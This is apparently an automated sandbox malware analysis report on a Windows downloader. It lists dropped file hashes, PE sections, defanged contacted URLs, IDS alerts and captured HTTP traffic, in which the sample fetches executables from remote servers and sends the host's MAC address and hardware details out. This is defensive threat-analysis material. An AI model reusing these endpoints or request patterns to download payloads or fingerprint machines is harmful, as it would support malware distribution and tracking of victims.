72da805e0e74f4639c1808055179ea18 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe
03df72aee6f6356ea0b59302f76e3d6e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe
ff3313ae059f35c64b811847f361755c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe
2b1f60b4aa2e7985933fc443d7f1a4ec c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RIBridage.exe
14ed061e194da38b934a5fd0711649d1 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll
dec05826e9eaf249432f411092581560 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView64.dll
2ceac8df5e707d11cc7d9b4039820076 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\chromerl.exe
5dbafb8fef44cc425f3d7d365a0b11d7 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\fixfunction.dll
e82589352ae7cda604e8bad9d7bf7e3a c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\guide.exe
2d088118d23afb88ad77bdfd285a5c4b c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\istask.dll
ff3313ae059f35c64b811847f361755c c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe
902d8c82ebff36c3378697a0752f4c64 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe
8bef94f713ed5a9ffa738d7fe0522f5d c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll
b639392811eb3f2340c4a2e069ec02eb c:\Windows\WindowsUpdate\otqvyruekg.exe
7cbfeaf236632c24c6806713e16d0ad4 c:\Windows\mm.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\pcq.exe
72da805e0e74f4639c1808055179ea18 c:\Windows\src2011.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\27e.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\BPp.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\Dqc.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\G57.exe
db2f4e853e6e1c5e69da92a8bf69f1b2 c:\Windows\tAzJsX\LiveUDHelper.dll
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\MIJ.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\PTR.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\bFuAq.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\drH.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             426462        430080    4.52617  34e1914c276d50c06f54370c7f58ecaf
.rdata  434176           2970308       2973696   4.33103  ef567c17d1699e5a2e118074589dbd45
.data   3407872          199658        61440     3.30411  a2844bbf7b3d0cfbb97dac48907e619c
.rsrc   3608576          23796         24576     3.48449  95a04cdb919fdc8d64a930ed5d5251b7

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://yd.ecoma.ourwebpic.com/ip2city.asp
hxxp://city.ip138.com/ip2city.asp 125.77.197.86
hxxp://yd.ecoma.ourwebpic.com/ips.asp?ip=194.242.96.218&action=2
hxxp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2 125.77.197.86
hxxp://e11290.dspg.akamaiedge.net/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://183.60.200.160/yy.txt
hxxp://movie.metaservices.windowsmedia.com.akadns.net/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://183.60.200.160/1819.exe
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://hostedocsp.globalsign.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU=
hxxp://www.900cpa.cc/tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac 211.149.219.119
hxxp://dl.jyrili.com.w.kunlunar.com/download/src2011.exe 27.221.30.109
hxxp://www.jyrili.com/client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://www.jyrili.com/client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://www.jyrili.com/client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://www.jyrili.com/client.do/?&method=install&n=91&_b=None_440BX Desktop Reference Platform&_c=GenuineIntel_Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz_0FEBFBFF000306C3&_d=&_m=0050563CAC71&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&version=4.0.3.0&sign=867066c5a4eecb5dbdb0b359b7cc2ac0&os=3&app_name= 121.42.212.184
hxxp://www.jyrili.com/client.do/?method=uiconfig2&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&type=0 121.42.212.184
hxxp://dl.jyrili.com.w.kunlunar.com/download/cupdate/cupdate.dat 27.221.30.109
hxxp://a1158.b.akamai.net/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/
hxxp://dl.jyrili.com/download/cupdate/cupdate.dat 27.221.30.109
hxxp://www.ip138.com/ips.asp?ip=194.242.96.218&action=2 87.245.198.83
hxxp://dl.jyrili.com/download/src2011.exe 27.221.30.109
hxxp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 65.55.186.113
hxxp://183.60.200.160:8080/yy.txt
hxxp://www.900cpa.cc:8080/tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac 211.149.219.119
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl 93.184.220.20
hxxp://go.microsoft.com/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 96.6.15.244
hxxp://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU= 198.41.214.186
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl 212.30.134.169
hxxp://183.60.200.160:8080/1819.exe
hxxp://vassg142.ocsp.omniroot.com/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ 2.21.89.26
hxxp://www.ip138.com/ip2city.asp 87.245.198.83
games.metaservices.microsoft.com 65.55.162.26
down.818wy.com 42.236.91.198
88.200jh.com 50.117.89.77


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Internal Host Getting External IP Address - ip2city.asp
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:31 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:56:20 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extenconfig/
exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafoddgbia
kognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 09 Jan
2017 19:56:21 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5
.7..91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extencon
fig/exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafodd
gbiakognoal"}..0..
....



GET /client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
570..{"code":"00000","data":"E1JQEgdfFBZFIgU0C00aXUQnGHJ1XTpJRRIcH0RBa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","desc":"succ"}..0
..
....

<<< skipped >>>

GET /client.do/?&method=install&n=91&_b=None_440BX Desktop Reference Platform&_c=GenuineIntel_Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz_0FEBFBFF000306C3&_d=&_m=0050563CAC71&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&version=4.0.3.0&sign=867066c5a4eecb5dbdb0b359b7cc2ac0&os=3&app_name= HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
2a..{"code":"00000","data":null,"desc":"succ"}..0......



GET /client.do/?method=uiconfig2&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&type=0 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
2a..{"code":"00000","data":null,"desc":"succ"}..0......



GET /client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.jyrili.com/
download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplgfolmdaaafo
ddgbiakognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 0
9 Jan 2017 19:56:26 GMT..Content-Type: text/html..Transfer-Encoding: c
hunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: P
HP/5.5.7..97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.j
yrili.com/download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplg
folmdaaafoddgbiakognoal"}..0..


GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:56 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extenconfig/exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafoddgbiakognoal"}..0..



GET /client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7

<<< skipped >>>

GET /client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.jyrili.com/download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplgfolmdaaafoddgbiakognoal"}..0..


GET /yy.txt HTTP/1.1
Accept: */*
Referer: hXXp://183.60.200.160:8080/yy.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 183.60.200.160:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 301
Content-Type: text/plain
Last-Modified: Mon, 09 Jan 2017 09:00:28 GMT
Accept-Ranges: bytes
ETag: "841fc7d2566ad21:7fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:36 GMT
<project>..<url>hXXp://183.60.200.160:8080/1819.exe</url>..<parameter></parameter>..</project>..<project>..<url>hXXp://dl.jyrili.com/download/src2011.exe</url>..<parameter></parameter>..</project>..<project>..<url>hXXp://down.818wy.com:8089/hyaz2_Y_10031.exe</url>..<parameter></parameter>..</project>



GET /1819.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: hXXp://183.60.200.160:8080/1819.exe
Content-Type: application/x-www-form-urlencoded
Host: 183.60.200.160:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 1314816
Content-Type: application/octet-stream
Last-Modified: Thu, 06 Oct 2016 16:07:20 GMT
Accept-Ranges: bytes
ETag: "4fe773b7eb1fd21:7fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:36 GMT

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:30 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /download/cupdate/cupdate.dat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: dl.jyrili.com


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 45909
Connection: keep-alive
Date: Mon, 09 Jan 2017 18:20:11 GMT
Last-Modified: Wed, 30 Nov 2016 02:34:39 GMT
ETag: "583e3abf-b355"
Accept-Ranges: bytes
Via: cache7.l2nu17[0,304-0,H], cache10.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[1,0]
Age: 5780
X-Cache: HIT TCP_MEM_HIT dirn:8:233989399
X-Swift-SaveTime: Mon, 09 Jan 2017 19:07:22 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0a14839917912854923e

<<< skipped >>>

GET /download/cupdate/cupdate.dat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: dl.jyrili.com


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 45909
Connection: keep-alive
Date: Mon, 09 Jan 2017 18:20:11 GMT
Last-Modified: Wed, 30 Nov 2016 02:34:39 GMT
ETag: "583e3abf-b355"
Accept-Ranges: bytes
Via: cache7.l2nu17[0,304-0,H], cache10.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun7.cn345[1,0]
Age: 5776
X-Cache: HIT TCP_MEM_HIT dirn:8:233989399
X-Swift-SaveTime: Mon, 09 Jan 2017 19:07:22 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0714839917873651029e

<<< skipped >>>

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:56 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /download/src2011.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: hXXp://dl.jyrili.com/download/src2011.exe
Content-Type: application/x-www-form-urlencoded
Host: dl.jyrili.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 1420400
Connection: keep-alive
Date: Mon, 09 Jan 2017 19:13:45 GMT
Last-Modified: Wed, 04 Jan 2017 06:02:16 GMT
ETag: "586c8fe8-15ac70"
Accept-Ranges: bytes
Via: cache1.l2nu17[0,304-0,H], cache18.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[0,0]
Age: 2534
X-Cache: HIT TCP_MEM_HIT dirn:10:903694853
X-Swift-SaveTime: Mon, 09 Jan 2017 19:47:38 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0a14839917594785101e

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:55:58 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP........[194.242.96.218] </center></body></html>



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:55:57 GMT
<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<title>IP........</title>..</head>..<body>..<script type="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.asp"+location.search;..</script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP..............</a>..</body>..</html>



GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:56:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP........[194.242.96.218] </center></body></html>



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:56:23 GMT
<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<title>IP........</title>..</head>..<body>..<script type="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.asp"+location.search;..</script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP..............</a>..</body>..</html>



GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:56:47 GMT
Server: Microsoft-IIS/6.0
Content-Length: 211
Content-Type: text/html
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP........[194.242.96.218] </center></body></html>



GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: city.ip138.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: ASPSESSIONIDSSDBACSR=GKEEAHNBJOHCBMOMIJDPCDKK


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/html
Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT
Accept-Ranges: bytes
ETag: "3a3cc6a611fcd1:9a8"
Server: Microsoft-IIS/6.0
Date: Mon, 09 Jan 2017 19:56:47 GMT
<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<title>IP........</title>..</head>..<body>..<script type="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.asp"+location.search;..</script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP..............</a>..</body>..</html>..


GET /locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: GamesWebServiceLocations
Host: movie.metaservices.microsoft.com


HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:32 GMT
Connection: close
Content-Length: 660
<?xml version="1.0" encoding="utf-8"?>..<ServiceLocaterResponse xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://VVV.w3.org/2001/XMLSchema" xmlns="hXXp://VVV.microsoft.com/Microsoft.WindowsMedia.Services.Platform.Apps.Mds.Locater">.. <Services>.. <ServiceLocation>.. <Name>Games</Name>.. <Url>hXXps://games.metaservices.microsoft.com/games/SGamesWebService.asmx</Url>.. </ServiceLocation>.. <ServiceLocation>.. <Name>GamesFeedback</Name>.. <Url>hXXp://gamesfeedback.metaservices.microsoft.com/gamesFeedback/GamesFeedbackWebService.asmx</Url>.. </ServiceLocation>.. </Services>..</ServiceLocaterResponse>..


GET /tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.900cpa.cc:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:54:48 GMT
Content-Length: 8
........



GET /tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.900cpa.cc:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:12 GMT
Content-Length: 6
......


GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 29 Oct 2013 05:02:50 GMT
If-None-Match: "b8b5df1d64d4ce1:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
